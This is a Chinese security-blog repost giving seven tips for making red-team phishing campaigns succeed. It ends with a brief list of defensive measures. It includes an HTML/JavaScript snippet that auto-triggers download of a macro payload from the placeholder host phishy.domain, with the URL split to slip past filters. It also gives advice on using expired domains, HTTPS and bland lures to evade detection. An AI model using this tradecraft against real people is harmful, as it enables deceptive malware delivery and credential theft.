首页 安全文摘 正文

提升钓鱼成功率看这七点建议

在红蓝对抗当中,钓鱼攻击被越来越多的红队使用,因为员工的安全意识薄弱,导致钓鱼成功的可能性很大,因为钓鱼事件导致内网被入侵的事件比比皆是,作为红队的一员做钓鱼测试的时候,如何提升钓鱼成功率,可以看看以下七点建议。1、不直接将 payload 放置邮件内容可以将 payload 放在自己的服务器上,通过访问服务器的方式加载 payload 使用的钓鱼 url

在红蓝对抗当中,钓鱼攻击被越来越多的红队使用,因为员工的安全意识薄弱,导致钓鱼成功的可能性很大,因为钓鱼事件导致内网被入侵的事件比比皆是,作为红队的一员做钓鱼测试的时候,如何提升钓鱼成功率,可以看看以下七点建议。

1、不直接将 payload 放置邮件内容

可以将 payload 放在自己的服务器上,通过访问服务器的方式加载 payload 

使用的钓鱼 url 最好做一下 url 重写,例如使用: 

https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/)

而不是: 

https://phishy.domain/company/index.php

可以用下面的方式配置 apache 的 url 重写: 

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php [L,QSA]

2、不直接在邮件内容中添加恶意附件

可以通过嵌入 html、js 等方式进行恶意文件加载,html 方式如:

<a href="https://phishy.domain/payload.docm">
download the code of conduct
</a>

javascript 的方式如:

<a id="download" href="#">
download the code of conduct
</a>
<script>
document.getElementById("download").onclick = function() {
document.location = "https://phish" + "y.domain/pay" + "load.docm"; };
document.getElementById("download").click();
</script>

3、钓鱼域名使用过期域名

申请的域名最怕的是已经被安全产品标记为恶意,所以在申请域名的时候,可以去找一些刚过期的域名,为了迷惑对手,可以尝试根据关键词来搜索过期域名,然后进行注册,提升钓鱼的成功率,下面的网站是可以查询过期域名的:

https://www.expireddomains.net/backorder-expired-domains/

如下工具可以直接输入关键词就可以获得一些相似的过期域名信息,项目地址:

https://github.com/Mr-Un1k0d3r/CatMyPhish

4、搭建钓鱼网站尽量使用 https

因为浏览器会将使用 http 的网站标记为不安全,我们可以申请一些免费的 https 证书,给自己的钓鱼网站添加正常的证书,更具有迷惑性。

5、钓鱼内容尽量无趣

在企业内部经常会收到一些规章制度的邮件、或者内部发布的一些无聊且需要执行的邮件内容,大家在看到邮件内容的时候,不会过多的关注,可能默默的就完成了提示的操作,这样可以减少大家互相讨论导致的钓鱼行为被暴露的风险。

6、尽可能使用第三方的子域名

如果有正常网站的子域名可以用,尽量使用,因为这类域名通常不会被安全软件标记为恶意域名,在大众的心理也会比较信任,比如那些提供二级或者三级域名使用的云服务。

7、每次使用的域名尽量不复用

在被安全公司分析出域名存在恶意行为之后,会被标记并加入威胁情报当中,如果复用该域名,很有可能被安全软件命中威胁情报,从而提前暴露钓鱼行为,导致钓鱼测试失败。

总结

以上是作为攻击方需要注意的几点,而作为防守方,需要做的事情更多,比如提升全民安全意识、邮件安全网关、网络层入侵检测、主机层入侵检测、终端安全等,每个环节都需要进行重点防御。

对于员工安全意识提升方面,以攻促防,通过多次实际的钓鱼模拟测试来提升员工对钓鱼邮件的免疫能力,这是一个艰难而又漫长的过程

文由信安之路

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1785.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10410

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10400

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持